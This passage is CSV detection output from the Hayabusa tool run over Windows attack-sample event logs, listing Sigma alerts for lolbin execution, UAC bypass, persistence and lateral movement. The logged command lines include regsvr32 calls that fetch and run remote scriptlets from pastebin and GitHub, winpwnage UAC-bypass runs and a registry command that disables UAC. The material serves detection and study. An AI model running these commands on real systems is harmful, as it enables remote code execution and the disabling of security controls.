c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx -2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx -2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx -2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread 